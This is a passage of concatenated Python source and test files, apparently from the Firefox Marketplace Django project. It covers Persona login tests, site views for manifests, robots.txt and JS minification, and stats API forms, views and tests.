'Should not have header: %s' % header)
@override_settings(CACHE_MIDDLEWARE_SECONDS=seconds, USE_ETAGS=True)
def test_no_headers_on_disallowed_statuses(self):
res = self.client.get('/404') # 404
self._test_headers_missing(res)
@override_settings(CACHE_MIDDLEWARE_SECONDS=seconds, USE_ETAGS=True)
def test_no_headers_on_disallowed_methods(self):
for method in ('delete', 'post', 'put'):
res = getattr(self.client, method)('/robots.txt')
self._test_headers_missing(res)
@override_settings(CACHE_MIDDLEWARE_SECONDS=0, USE_ETAGS=True)
def test_no_headers_no_max_age(self):
self._test_headers_missing(self.client.get('/robots.txt'))
@override_settings(CACHE_MIDDLEWARE_SECONDS=0, USE_ETAGS=True)
def test_no_headers_no_querystring(self):
self._test_headers_missing(self.client.get('/robots.txt'))
@override_settings(CACHE_MIDDLEWARE_SECONDS=seconds, USE_ETAGS=True)
def test_headers_set(self):
for method in ('get', 'head', 'options'):
res = getattr(self.client, method)('/robots.txt?cache=1')
self._test_headers_set(res)
########NEW FILE########
__FILENAME__ = test_persona_login
import collections
import json
from datetime import datetime
from urlparse import urlparse
from django.conf import settings
from django.core.urlresolvers import reverse
from mock import ANY, Mock, patch
from nose.tools import eq_
import amo
from access.models import Group, GroupUser
from users.models import UserProfile
from users.views import browserid_authenticate
def fake_request():
request = Mock()
request.LANG = 'foo'
request.GET = request.META = {}
# Fake out host/scheme for Persona login.
request.get_host.return_value = urlparse(settings.SITE_URL).netloc
request.is_secure.return_value = False
return request
FakeResponse = collections.namedtuple("FakeResponse", "status_code content")
class TestPersonaLogin(amo.tests.TestCase):
fixtures = ('users/test_backends',)
def setUp(self):
super(TestPersonaLogin, self).setUp()
self.client = amo.tests.TestClient()
self.client.get('/')
self.user = UserProfile.objects.get(id='4043307')
self.url = reverse('users.browserid_login')
self.data = {'username': '[email protected]', 'password': 'foo'}
@patch('requests.post')
def test_browserid_login_success(self, http_request):
"""
A success response from BrowserID results in successful login.
"""
url = reverse('users.browserid_login')
http_request.return_value = FakeResponse(200, json.dumps(
{'status': 'okay',
'email': '[email protected]'}))
res = self.client.post(url, data=dict(assertion='fake-assertion',
audience='fakeamo.org'))
eq_(res.status_code, 200)
# If they're already logged in we return fast.
eq_(self.client.post(url).status_code, 200)
@patch('requests.post')
def test_browserid_unverified_login_success(self, http_request):
"""A success response from BrowserID results in a successful login."""
# Preverified accounts should not be accessible to unverified
# logins.
http_request.return_value = FakeResponse(200, json.dumps(
{'status': 'okay', 'unverified-email': '[email protected]'}))
res = self.client.post(self.url, {'assertion': 'fake-assertion',
'audience': 'fakeamo.org'})
eq_(res.status_code, 401)
eq_(self.user.reload().is_verified, True)
# A completely unverified address should be able to log in.
self.user.update(is_verified=False)
http_request.return_value = FakeResponse(200, json.dumps(
{'status': 'okay', 'unverified-email': '[email protected]'}))
res = self.client.post(self.url, {'assertion': 'fake-assertion',
'audience': 'fakeamo.org'})
eq_(res.status_code, 200)
eq_(self.user.reload().is_verified, False)
# If the user is already logged in, then we return fast.
eq_(self.client.post(self.url).status_code, 200)
@patch('users.models.UserProfile.log_login_attempt')
@patch('requests.post')
def test_browserid_login_logged(self, http_request, log_login_attempt):
url = reverse('users.browserid_login')
http_request.return_value = FakeResponse(200, json.dumps(
{'status': 'okay', 'email': '[email protected]'}))
self.client.post(url, data=dict(assertion='fake-assertion',
audience='fakeamo.org'))
log_login_attempt.assert_called_once_with(True)
def _make_admin_user(self, email):
"""
Create a user with at least one admin privilege.
"""
p = UserProfile.objects.create(
username='admin', email=email,
password='hunter2', created=datetime.now(), pk=998)
admingroup = Group.objects.create(rules='Users:Edit')
GroupUser.objects.create(group=admingroup, user=p)
def _browserid_login(self, email, http_request):
http_request.return_value = FakeResponse(
200, json.dumps({'status': 'okay', 'email': email}))
return self.client.post(reverse('users.browserid_login'),
data=dict(assertion='fake-assertion',
audience='fakeamo.org'))
@patch('requests.post')
def test_browserid_restricted_login(self, http_request):
"""
A success response from BrowserID for accounts restricted to
password login results in a 400 error, for which the frontend
will display a message about the restriction.
"""
email = '[email protected]'
self._make_admin_user(email)
res = self._browserid_login(email, http_request)
eq_(res.status_code, 200)
@patch('requests.post')
@patch('users.views.record_action')
def test_browserid_no_account(self, record_action, http_request):
"""
BrowserID login for an email address with no account creates a
new account.
"""
email = '[email protected]'
res = self._browserid_login(email, http_request)
eq_(res.status_code, 200)
profiles = UserProfile.objects.filter(email=email)
eq_(len(profiles), 1)
eq_(profiles[0].username, 'newuser')
eq_(profiles[0].display_name, 'newuser')
@patch('requests.post')
@patch('users.views.record_action')
def test_browserid_misplaced_auth_user(self, record_action, http_request):
"""
Login still works even after the user has changed his email
address on AMO.
"""
url = reverse('users.browserid_login')
profile = UserProfile.objects.create(username='login_test',
email='[email protected]')
profile.email = '[email protected]'
profile.save()
http_request.return_value = FakeResponse(200, json.dumps(
{'status': 'okay',
'email': '[email protected]'}))
res = self.client.post(url, data=dict(assertion='fake-assertion',
audience='fakeamo.org'))
eq_(res.status_code, 200)
@patch('requests.post')
@patch('users.views.record_action')
def test_browserid_no_auth_user(self, record_action, http_request):
"""
Login still works after a new UserProfile has been created for an
email address another UserProfile formerly used.
"""
url = reverse('users.browserid_login')
UserProfile.objects.get(email="[email protected]").update(
email="[email protected]")
UserProfile.objects.create(email="[email protected]")
http_request.return_value = FakeResponse(200, json.dumps(
{'status': 'okay',
'email': '[email protected]'}))
res = self.client.post(url, data=dict(assertion='fake-assertion',
audience='fakeamo.org'))
eq_(res.status_code, 200)
@patch('requests.post')
@patch('users.views.record_action')
def test_browserid_no_mark_as_market(self, record_action, post):
email = '[email protected]'
self._browserid_login(email, post)
profile = UserProfile.objects.get(email=email)
assert not profile.notes
@patch('requests.post')
def test_browserid_login_failure(self, http_request):
"""
A failure response from BrowserID results in login failure.
"""
http_request.return_value = FakeResponse(200, json.dumps(
{'status': 'busted'}))
res = self.client.post(reverse('users.browserid_login'),
data=dict(assertion='fake-assertion',
audience='fakeamo.org'))
eq_(res.status_code, 401)
assert 'Persona authentication failure' in res.content
@patch('requests.post')
@patch('users.views.record_action')
def test_browserid_duplicate_username(self, record_action, post):
email = '[email protected]' # existing
post.return_value = FakeResponse(200, json.dumps({'status': 'okay',
'email': email}))
res = self.client.post(reverse('users.browserid_login'),
data=dict(assertion='fake-assertion',
audience='fakeamo.org'))
eq_(res.status_code, 200)
profiles = UserProfile.objects.filter(email=email)
eq_(profiles[0].username, 'jbalogh2')
eq_(profiles[0].display_name, 'jbalogh2')
# Note: lower level unit tests for this functionality are in
# TestAutoCreateUsername()
@patch('requests.post')
def create_profile(self, http_request):
email = '[email protected]'
http_request.return_value = FakeResponse(200,
json.dumps({'status': 'okay',
'email': email}))
request = fake_request()
browserid_authenticate(request=request, assertion='fake-assertion')
return UserProfile.objects.get(email=email)
@patch('users.views.record_action')
def test_mmo_source(self, record_action):
profile = self.create_profile()
eq_(profile.source, amo.LOGIN_SOURCE_MMO_BROWSERID)
assert record_action.called
@patch.object(settings, 'NATIVE_BROWSERID_VERIFICATION_URL',
'http://my-custom-b2g-verifier.org/verify')
@patch.object(settings, 'SITE_URL', 'http://testserver')
@patch.object(settings, 'UNVERIFIED_ISSUER', 'some-issuer')
@patch('requests.post')
def test_mobile_persona_login(self, http_request):
http_request.return_value = FakeResponse(200, json.dumps(
{'status': 'okay',
'email': '[email protected]'}))
self.client.post(reverse('users.browserid_login'),
data=dict(assertion='fake-assertion',
audience='fakeamo.org',
is_mobile='1'))
http_request.assert_called_with(
settings.NATIVE_BROWSERID_VERIFICATION_URL,
verify=ANY, proxies=ANY, data=ANY, timeout=ANY,
headers=ANY)
data = http_request.call_args[1]['data']
eq_(data['audience'], 'http://testserver')
eq_(data['experimental_forceIssuer'], settings.UNVERIFIED_ISSUER)
eq_(data['experimental_allowUnverified'], 'true')
@patch.object(settings, 'SITE_URL', 'http://testserver')
@patch.object(settings, 'UNVERIFIED_ISSUER', 'some-issuer')
@patch('requests.post')
def test_non_mobile_persona_login(self, http_request):
http_request.return_value = FakeResponse(200, json.dumps(
{'status': 'okay',
'email': '[email protected]'}))
self.client.post(reverse('users.browserid_login'),
data=dict(assertion='fake-assertion',
audience='fakeamo.org'))
assert http_request.called
data = http_request.call_args[1]['data']
eq_(data['audience'], 'http://testserver')
eq_(data['experimental_forceIssuer'], settings.UNVERIFIED_ISSUER)
assert 'experimental_allowUnverified' not in data, (
'not allowing unverfied when not native')
@patch.object(settings, 'NATIVE_BROWSERID_VERIFICATION_URL',
'http://my-custom-b2g-verifier.org/verify')
@patch.object(settings, 'SITE_URL', 'http://testserver')
@patch.object(settings, 'UNVERIFIED_ISSUER', None)
@patch('requests.post')
def test_mobile_persona_login_without_issuer(self, http_request):
http_request.return_value = FakeResponse(200, json.dumps(
{'status': 'okay',
'email': '[email protected]'}))
self.client.post(reverse('users.browserid_login'),
data=dict(assertion='fake-assertion',
audience='fakeamo.org',
is_mobile='1'))
data = http_request.call_args[1]['data']
eq_(data['audience'], 'http://testserver')
assert 'experimental_forceIssuer' not in data, (
'not forcing issuer when the setting is blank')
@patch('requests.post')
def test_mobile_persona_login_ignores_garbage(self, http_request):
http_request.return_value = FakeResponse(200, json.dumps(
{'status': 'okay',
'email': '[email protected]'}))
self.client.post(reverse('users.browserid_login'),
data=dict(assertion='fake-assertion',
audience='fakeamo.org',
is_mobile='<garbage>'))
########NEW FILE########
__FILENAME__ = test_views
import json
from urlparse import urljoin
from django.conf import settings
from django.core.cache import cache
from django.core.urlresolvers import reverse
from django.test.utils import override_settings
import mock
from lxml import etree
from nose import SkipTest
from nose.tools import eq_
from pyquery import PyQuery as pq
import amo
import amo.tests
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
class Test403(amo.tests.TestCase):
fixtures = ['base/users'] + fixture('webapp_337141')
def setUp(self):
assert self.client.login(username='[email protected]',
password='password')
def _test_403(self, url):
res = self.client.get(url, follow=True)
eq_(res.status_code, 403)
self.assertTemplateUsed(res, 'site/403.html')
def test_403_admin(self):
self._test_403('/admin')
def test_403_devhub(self):
assert self.client.login(username='[email protected]',
password='password')
app = Webapp.objects.get(pk=337141)
self._test_403(app.get_dev_url('edit'))
def test_403_reviewer(self):
self._test_403('/reviewers')
class Test404(amo.tests.TestCase):
fixtures = fixture('webapp_337141')
def _test_404(self, url):
r = self.client.get(url, follow=True)
eq_(r.status_code, 404)
self.assertTemplateUsed(r, 'site/404.html')
return r
def test_404(self):
self._test_404('/xxx')
def test_404_devhub(self):
self._test_404('/developers/xxx')
def test_404_consumer_legacy(self):
self._test_404('/xxx')
def test_404_consumer(self):
self._test_404('/xxx')
def test_404_api(self):
res = self.client.get('/api/this-should-never-work/')
eq_(res.status_code, 404)
eq_(res.content, '')
class TestManifest(amo.tests.TestCase):
def setUp(self):
self.url = reverse('manifest.webapp')
@mock.patch('mkt.carriers.carriers.CARRIERS', {'boop': 'boop'})
@mock.patch.object(settings, 'WEBAPP_MANIFEST_NAME', 'Firefox Marketplace')
@mock.patch('mkt.site.views.get_carrier')
def test_manifest(self, mock_get_carrier):
mock_get_carrier.return_value = 'boop'
response = self.client.get(reverse('manifest.webapp'))
eq_(response.status_code, 200)
eq_(response['Content-Type'], 'application/x-web-app-manifest+json')
content = json.loads(response.content)
eq_(content['name'], 'Firefox Marketplace')
url = reverse('manifest.webapp')
assert 'en-US' not in url and 'firefox' not in url
eq_(content['launch_path'], '/?carrier=boop')
@mock.patch('mkt.carriers.carriers.CARRIERS', [])
def test_manifest_no_carrier(self):
response = self.client.get(self.url)
eq_(response.status_code, 200)
content = json.loads(response.content)
assert 'launch_path' not in content
@mock.patch.object(settings, 'WEBAPP_MANIFEST_NAME', 'Mozilla Fruitstand')
def test_manifest_name(self):
response = self.client.get(self.url)
eq_(response.status_code, 200)
content = json.loads(response.content)
eq_(content['name'], 'Mozilla Fruitstand')
def test_manifest_orientation(self):
response = self.client.get(self.url)
eq_(response.status_code, 200)
content = json.loads(response.content)
eq_(content['orientation'], ['portrait-primary'])
def test_manifest_etag(self):
resp = self.client.get(self.url)
etag = resp.get('Etag')
assert etag, 'Missing ETag'
# Trigger a change to the manifest by changing the name.
with self.settings(WEBAPP_MANIFEST_NAME='Mozilla Fruitstand'):
resp = self.client.get(self.url)
assert resp.get('Etag'), 'Missing ETag'
self.assertNotEqual(etag, resp.get('Etag'))
def test_conditional_get_manifest(self):
resp = self.client.get(self.url)
etag = resp.get('Etag')
resp = self.client.get(self.url, HTTP_IF_NONE_MATCH=str(etag))
eq_(resp.content, '')
eq_(resp.status_code, 304)
class TestMozmarketJS(amo.tests.TestCase):
def setUp(self):
cache.clear()
def render(self):
return self.client.get(reverse('site.mozmarket_js'))
@mock.patch.object(settings, 'SITE_URL', 'https://secure-mkt.com/')
@mock.patch.object(settings, 'MINIFY_MOZMARKET', False)
def test_render(self):
resp = self.render()
self.assertContains(resp, "var server = 'https://secure-mkt.com/'")
eq_(resp['Content-Type'], 'text/javascript')
@mock.patch.object(settings, 'SITE_URL', 'https://secure-mkt.com/')
@mock.patch.object(settings, 'MINIFY_MOZMARKET', True)
def test_minify(self):
resp = self.render()
# Check for no space after equal sign.
self.assertContains(resp, '="https://secure-mkt.com/"')
@mock.patch.object(settings, 'MINIFY_MOZMARKET', True)
@mock.patch.object(settings, 'UGLIFY_BIN', None)
def test_minify_with_yui(self):
self.render() # no errors
@mock.patch.object(settings, 'MINIFY_MOZMARKET', False)
def test_receiptverifier(self):
resp = self.render()
self.assertContains(resp, 'exports.receipts.Verifier')
@mock.patch.object(settings, 'MOZMARKET_VENDOR_EXCLUDE',
['receiptverifier'])
@mock.patch.object(settings, 'MINIFY_MOZMARKET', False)
def test_exclude(self):
resp = self.render()
self.assertNotContains(resp, 'exports.receipts.Verifier')
class TestRobots(amo.tests.TestCase):
@override_settings(CARRIER_URLS=['seavanworld'])
@override_settings(ENGAGE_ROBOTS=True)
def test_engage_robots(self):
rs = self.client.get('/robots.txt')
self.assertContains(rs, 'Allow: /')
self.assertContains(rs, 'Disallow: /seavanworld/')
@override_settings(ENGAGE_ROBOTS=False)
def test_do_not_engage_robots(self):
rs = self.client.get('/robots.txt')
self.assertContains(rs, 'Disallow: /')
class TestOpensearch(amo.tests.TestCase):
def test_opensearch_declaration(self):
"""Look for opensearch declaration in templates."""
response = self.client.get(reverse('commonplace.fireplace'))
elm = pq(response.content)(
'link[rel=search][type="application/opensearchdescription+xml"]')
eq_(elm.attr('href'), reverse('opensearch'))
eq_(elm.attr('title'), 'Firefox Marketplace')
def test_opensearch(self):
response = self.client.get(reverse('opensearch'))
eq_(response['Content-Type'], 'text/xml')
eq_(response.status_code, 200)
doc = etree.fromstring(response.content)
e = doc.find('{http://a9.com/-/spec/opensearch/1.1/}ShortName')
eq_(e.text, 'Firefox Marketplace')
e = doc.find('{http://a9.com/-/spec/opensearch/1.1/}Url')
wanted = '%s?q={searchTerms}' % urljoin(settings.SITE_URL, '/search')
eq_(e.attrib['template'], wanted)
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import patterns, url
from . import views
urlpatterns = patterns('',
url('^mozmarket.js$', views.mozmarket_js, name='site.mozmarket_js'),
url('^robots.txt$', views.robots, name='robots.txt'),
# Replace opensearch.xml from amo with a specific one for Marketplace.
url('^opensearch.xml$', views.OpensearchView.as_view(), name='opensearch'),
# These are the new manifest URLs going forward.
url('^hosted.webapp$', views.manifest, name='hosted.webapp'),
url('^packaged.webapp$', views.package_minifest, name='packaged.webapp'),
url('^marketplace-package.webapp$', views.yogafire_minifest,
name='packaged-marketplace.webapp'),
# TODO: Deprecate this in favour of the ones above.
url('^manifest.webapp$', views.manifest, name='manifest.webapp'),
url('^minifest.webapp$', views.package_minifest, name='minifest.webapp'),
url('^timing/record$', views.record, name='mkt.timing.record'),
)
########NEW FILE########
__FILENAME__ = views
import hashlib
import json
import logging
import os
import subprocess
from django.conf import settings
from django.core.exceptions import PermissionDenied
from django.http import (HttpResponse, HttpResponseNotFound,
HttpResponseServerError)
from django.shortcuts import render
from django.template import RequestContext
from django.views.decorators.cache import cache_page
from django.views.decorators.csrf import csrf_exempt, requires_csrf_token
from django.views.decorators.http import etag
from django.views.generic.base import TemplateView
import jingo_minify
from django_statsd.clients import statsd
from django_statsd.views import record as django_statsd_record
from jingo import render_to_string
from amo.context_processors import get_collect_timings
from amo.decorators import post_required
from amo.helpers import media
from amo.utils import urlparams
from mkt.carriers import get_carrier
from mkt.detail.views import manifest as mini_manifest
log = logging.getLogger('z.mkt.site')
# This can be called when CsrfViewMiddleware.process_view has not run,
# therefore needs @requires_csrf_token in case the template needs
# {% csrf_token %}.
@requires_csrf_token
def handler403(request):
# TODO: Bug 793241 for different 403 templates at different URL paths.
return render(request, 'site/403.html', status=403)
def handler404(request):
if request.path_info.startswith('/api/'):
# Pass over to API handler404 view if API was targeted.
return HttpResponseNotFound()
else:
return render(request, 'site/404.html', status=404)
def handler500(request):
if request.path_info.startswith('/api/'):
# Pass over to API handler500 view if API was targeted.
return HttpResponseServerError()
else:
return render(request, 'site/500.html', status=500)
def csrf_failure(request, reason=''):
return render(request, 'site/403.html',
{'because_csrf': 'CSRF' in reason}, status=403)
def manifest(request):
ctx = RequestContext(request)
data = {
'name': getattr(settings, 'WEBAPP_MANIFEST_NAME',
'Firefox Marketplace'),
'description': 'The Firefox Marketplace',
'developer': {
'name': 'Mozilla',
'url': 'http://mozilla.org',
},
'icons': {
# Using the default addon image until we get a marketplace logo.
'128': media(ctx, 'img/mkt/logos/128.png'),
'64': media(ctx, 'img/mkt/logos/64.png'),
'32': media(ctx, 'img/mkt/logos/32.png'),
},
'activities': {
'marketplace-app': {'href': '/'},
'marketplace-app-rating': {'href': '/'},
'marketplace-category': {'href': '/'},
'marketplace-search': {'href': '/'},
},
'orientation': ['portrait-primary']
}
if get_carrier():
data['launch_path'] = urlparams('/', carrier=get_carrier())
manifest_content = json.dumps(data)
manifest_etag = hashlib.sha256(manifest_content).hexdigest()
@etag(lambda r: manifest_etag)
def _inner_view(request):
response = HttpResponse(manifest_content,
mimetype='application/x-web-app-manifest+json')
return response
return _inner_view(request)
def package_minifest(request):
"""Serve mini manifest ("minifest") for Yulelog's packaged `.zip`."""
if not settings.MARKETPLACE_GUID:
return HttpResponseNotFound()
return mini_manifest(request, settings.MARKETPLACE_GUID)
def yogafire_minifest(request):
"""Serve mini manifest ("minifest") for Yogafire's packaged `.zip`."""
if not settings.YOGAFIRE_GUID:
return HttpResponseNotFound()
return mini_manifest(request, settings.YOGAFIRE_GUID)
def robots(request):
"""Generate a `robots.txt`."""
template = render(request, 'site/robots.txt')
return HttpResponse(template, mimetype='text/plain')
@csrf_exempt
@post_required
def record(request):
# The rate limiting is done up on the client, but if things go wrong
# we can just turn the percentage down to zero.
if get_collect_timings():
return django_statsd_record(request)
raise PermissionDenied
# Cache this for an hour so that newly deployed changes are available within
# an hour. This will be served from the CDN which mimics these headers.
@cache_page(60 * 60)
def mozmarket_js(request):
vendor_js = []
for lib, path in (('receiptverifier',
'receiptverifier/receiptverifier.js'),):
if lib in settings.MOZMARKET_VENDOR_EXCLUDE:
continue
with open(os.path.join(settings.ROOT,
'vendor', 'js', path), 'r') as fp:
vendor_js.append((lib, fp.read()))
js = render_to_string(request, 'site/mozmarket.js',
{'vendor_js': vendor_js})
if settings.MINIFY_MOZMARKET:
js = minify_js(js)
return HttpResponse(js, content_type='text/javascript')
@statsd.timer('mkt.mozmarket.minify')
def minify_js(js):
if settings.UGLIFY_BIN:
log.info('minifying JS with uglify')
return _minify_js_with_uglify(js)
else:
# The YUI fallback here is important
# because YUI compressor is bundled with jingo
# minify and therefore doesn't require any deps.
log.info('minifying JS with YUI')
return _minify_js_with_yui(js)
def _minify_js_with_uglify(js):
sp = _open_pipe([settings.UGLIFY_BIN])
js, err = sp.communicate(js)
if sp.returncode != 0:
raise ValueError('Compressing JS with uglify failed; error: %s'
% err.strip())
return js
def _minify_js_with_yui(js):
jar = os.path.join(os.path.dirname(jingo_minify.__file__), 'bin',
'yuicompressor-2.4.7.jar')
if not os.path.exists(jar):
raise ValueError('Could not find YUI compressor; tried %r' % jar)
sp = _open_pipe([settings.JAVA_BIN, '-jar', jar, '--type', 'js',
'--charset', 'utf8'])
js, err = sp.communicate(js)
if sp.returncode != 0:
raise ValueError('Compressing JS with YUI failed; error: %s'
% err.strip())
return js
def _open_pipe(cmd):
return subprocess.Popen(cmd,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
class OpensearchView(TemplateView):
content_type = 'text/xml'
template_name = 'mkt/opensearch.xml'
########NEW FILE########
__FILENAME__ = forms
from django import forms
import happyforms
from tower import ugettext_lazy as _lazy
INTERVAL_CHOICES = (
# Elasticsearch supports minute and hour but we don't.
('day', _lazy('Day')),
('week', _lazy('Week')),
('month', _lazy('Month')),
('quarter', _lazy('Quarter')),
('year', _lazy('Year')),
)
DATE_INPUT_FORMATS = ('%Y-%m-%d', '%Y%m%d')
class StatsForm(happyforms.Form):
start = forms.DateField(required=True, input_formats=DATE_INPUT_FORMATS)
end = forms.DateField(required=True, input_formats=DATE_INPUT_FORMATS)
interval = forms.ChoiceField(required=True, choices=INTERVAL_CHOICES,
initial='day')
########NEW FILE########
__FILENAME__ = test_forms
from nose.tools import eq_, ok_
import amo.tests
from mkt.stats.forms import StatsForm
class TestStatsForm(amo.tests.TestCase):
def setUp(self):
self.data = {'start': '2013-04-01',
'end': '2013-04-15',
'interval': 'day'}
def _check(self, form, valid, fields):
eq_(form.is_valid(), valid)
eq_(len(form.errors), len(fields))
for f in fields:
ok_(f in form.errors)
def test_good(self):
form = StatsForm(self.data)
ok_(form.is_valid(), form.errors)
def test_no_values(self):
form = StatsForm({})
self._check(form, False, ['start', 'end', 'interval'])
def test_other_date_format(self):
self.data.update({'start': '20130401'})
form = StatsForm(self.data)
ok_(form.is_valid(), form.errors)
def test_bad_date(self):
self.data.update({'start': 'abc'})
form = StatsForm(self.data)
self._check(form, False, ['start'])
def test_interval(self):
self.data.update({'interval': 'second'})
form = StatsForm(self.data)
self._check(form, False, ['interval'])
########NEW FILE########
__FILENAME__ = test_views
import json
import mock
import requests
from nose.tools import eq_, ok_
from rest_framework.reverse import reverse
from django.conf import settings
import amo
from stats.models import Contribution
from mkt.api.tests.test_oauth import RestOAuth
from mkt.site.fixtures import fixture
from mkt.stats.views import APP_STATS, STATS, _get_monolith_data
class StatsAPITestMixin(object):
def setUp(self):
super(StatsAPITestMixin, self).setUp()
patches = [
mock.patch('monolith.client.Client'),
mock.patch.object(settings, 'MONOLITH_SERVER', 'http://0.0.0.0:0'),
]
for patch in patches:
patch.start()
self.addCleanup(patch.stop)
def test_cors(self):
res = self.client.get(self.url(), data=self.data)
self.assertCORS(res, 'get')
def test_verbs(self):
self._allowed_verbs(self.url(), ['get'])
@mock.patch('monolith.client.Client')
def test_monolith_down(self, mocked):
mocked.side_effect = requests.ConnectionError
res = self.client.get(self.url(), data=self.data)
eq_(res.status_code, 503)
def test_anon(self):
res = self.anon.get(self.url())
eq_(res.status_code, 403)
class TestGlobalStatsResource(StatsAPITestMixin, RestOAuth):
def setUp(self):
super(TestGlobalStatsResource, self).setUp()
self.grant_permission(self.profile, 'Stats:View')
self.data = {'start': '2013-04-01',
'end': '2013-04-15',
'interval': 'day'}
def url(self, metric=None):
metric = metric or STATS.keys()[0]
return reverse('global_stats', kwargs={'metric': metric})
def test_bad_metric(self):
res = self.client.get(self.url('foo'))
eq_(res.status_code, 404)
def test_missing_args(self):
res = self.client.get(self.url())
eq_(res.status_code, 400)
data = json.loads(res.content)
for f in ('start', 'end', 'interval'):
eq_(data['detail'][f], ['This field is required.'])
def test_good(self):
res = self.client.get(self.url(), data=self.data)
eq_(res.status_code, 200)
eq_(json.loads(res.content)['objects'], [])
@mock.patch('monolith.client.Client')
def test_dimensions(self, mocked):
client = mock.MagicMock()
mocked.return_value = client
data = self.data.copy()
data.update({'region': 'br', 'package_type': 'hosted'})
res = self.client.get(self.url('apps_added_by_package'), data=data)
eq_(res.status_code, 200)
ok_(client.called)
eq_(client.call_args[1], {'region': 'br', 'package_type': 'hosted'})
@mock.patch('monolith.client.Client')
def test_dimensions_default(self, mocked):
client = mock.MagicMock()
mocked.return_value = client
res = self.client.get(self.url('apps_added_by_package'),
data=self.data)
eq_(res.status_code, 200)
ok_(client.called)
eq_(client.call_args[1], {'region': 'us', 'package_type': 'hosted'})
@mock.patch('monolith.client.Client')
def test_dimensions_default_is_none(self, mocked):
client = mock.MagicMock()
mocked.return_value = client
res = self.client.get(self.url('apps_installed'), data=self.data)
eq_(res.status_code, 200)
ok_(client.called)
eq_(client.call_args[1], {})
data = self.data.copy()
data['region'] = 'us'
res = self.client.get(self.url('apps_installed'), data=data)
eq_(res.status_code, 200)
ok_(client.called)
eq_(client.call_args[1], {'region': 'us'})
@mock.patch('monolith.client.Client')
def test_coersion(self, mocked):
client = mock.MagicMock()
client.return_value = [{'count': 1.99, 'date': '2013-10-10'}]
mocked.return_value = client
data = _get_monolith_data(
{'metric': 'foo', 'coerce': {'count': str}}, '2013-10-10',
'2013-10-10', 'day', {})
eq_(type(data['objects'][0]['count']), str)
class TestAppStatsResource(StatsAPITestMixin, RestOAuth):
fixtures = fixture('user_2519')
def setUp(self):
super(TestAppStatsResource, self).setUp()
self.app = amo.tests.app_factory(status=amo.STATUS_PUBLIC)
self.app.addonuser_set.create(user=self.user)
self.data = {'start': '2013-04-01', 'end': '2013-04-15',
'interval': 'day'}
def url(self, pk=None, metric=None):
pk = pk or self.app.pk
metric = metric or APP_STATS.keys()[0]
return reverse('app_stats', kwargs={'pk': pk, 'metric': metric})
def test_owner(self):
res = self.client.get(self.url(), data=self.data)
eq_(res.status_code, 200)
def test_perms(self):
self.app.addonuser_set.all().delete()
self.grant_permission(self.profile, 'Stats:View')
res = self.client.get(self.url(), data=self.data)
eq_(res.status_code, 200)
def test_bad_app(self):
res = self.client.get(self.url(pk=99999999))
eq_(res.status_code, 404)
def test_bad_metric(self):
res = self.client.get(self.url(metric='foo'))
eq_(res.status_code, 404)
def test_missing_args(self):
res = self.client.get(self.url())
eq_(res.status_code, 400)
data = json.loads(res.content)
for f in ('start', 'end', 'interval'):
eq_(data['detail'][f], ['This field is required.'])
class TestGlobalStatsTotalResource(StatsAPITestMixin, RestOAuth):
fixtures = fixture('user_2519')
def setUp(self):
super(TestGlobalStatsTotalResource, self).setUp()
self.grant_permission(self.profile, 'Stats:View')
self.data = None # For the mixin tests.
def url(self):
return reverse('global_stats_total')
def test_perms(self):
res = self.client.get(self.url())
eq_(res.status_code, 200)
class TestAppStatsTotalResource(StatsAPITestMixin, RestOAuth):
fixtures = fixture('user_2519')
def setUp(self):
super(TestAppStatsTotalResource, self).setUp()
self.app = amo.tests.app_factory(status=amo.STATUS_PUBLIC)
self.app.addonuser_set.create(user=self.user)
self.data = None # For the mixin tests.
def url(self, pk=None, metric=None):
pk = pk or self.app.pk
return reverse('app_stats_total', kwargs={'pk': pk})
def test_owner(self):
res = self.client.get(self.url())
eq_(res.status_code, 200)
def test_perms(self):
self.app.addonuser_set.all().delete()
self.grant_permission(self.profile, 'Stats:View')
res = self.client.get(self.url())
eq_(res.status_code, 200)
def test_bad_app(self):
res = self.client.get(self.url(pk=99999999))
eq_(res.status_code, 404)
class TestTransactionResource(RestOAuth):
fixtures = fixture('prices', 'user_2519', 'webapp_337141')
def setUp(self):
super(TestTransactionResource, self).setUp()
Contribution.objects.create(
addon_id=337141,
amount='1.89',
currency='EUR',
price_tier_id=2,
uuid='abcdef123456',
transaction_id='abc-def',
type=1,
user=self.user
)
def url(self, t_id=None):
t_id = t_id or 'abc-def'
return reverse('transaction_api', kwargs={'transaction_id': t_id})
def test_cors(self):
res = self.client.get(self.url())
self.assertCORS(res, 'get')
def test_verbs(self):
self.grant_permission(self.profile, 'RevenueStats:View')
self._allowed_verbs(self.url(), ['get'])
def test_anon(self):
res = self.anon.get(self.url())
eq_(res.status_code, 403)
def test_bad_txn(self):
self.grant_permission(self.profile, 'RevenueStats:View')
res = self.client.get(self.url('foo'))
eq_(res.status_code, 404)
def test_good_but_no_permission(self):
res = self.client.get(self.url())
eq_(res.status_code, 403)
def test_good(self):
self.grant_permission(self.profile, 'RevenueStats:View')
res = self.client.get(self.url())
eq_(res.status_code, 200)
obj = json.loads(res.content)
eq_(obj['id'], 'abc-def')
eq_(obj['app_id'], 337141)
eq_(obj['amount_USD'], '1.99')
eq_(obj['type'], 'Purchase')
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import patterns, url
from . import views
stats_api_patterns = patterns('',
url(r'^stats/global/totals/$', views.GlobalStatsTotal.as_view(),
name='global_stats_total'),
url(r'^stats/global/(?P<metric>[^/]+)/$', views.GlobalStats.as_view(),
name='global_stats'),
url(r'^stats/app/(?P<pk>[^/<>"\']+)/totals/$',
views.AppStatsTotal.as_view(), name='app_stats_total'),
url(r'^stats/app/(?P<pk>[^/<>"\']+)/(?P<metric>[^/]+)/$',
views.AppStats.as_view(), name='app_stats'),
)
txn_api_patterns = patterns('',
url(r'^transaction/(?P<transaction_id>[^/]+)/$',
views.TransactionAPI.as_view(),
name='transaction_api'),
)
########NEW FILE########
__FILENAME__ = views
from django import http
import commonware
import requests
from rest_framework.exceptions import ParseError
from rest_framework.generics import ListAPIView
from rest_framework.response import Response
from rest_framework.views import APIView
from lib.metrics import get_monolith_client
import amo
from stats.models import Contribution
from mkt.api.authentication import (RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.authorization import AllowAppOwner, AnyOf, GroupPermission
from mkt.api.base import CORSMixin, SlugOrIdMixin
from mkt.api.exceptions import ServiceUnavailable
from mkt.webapps.models import Webapp
from .forms import StatsForm
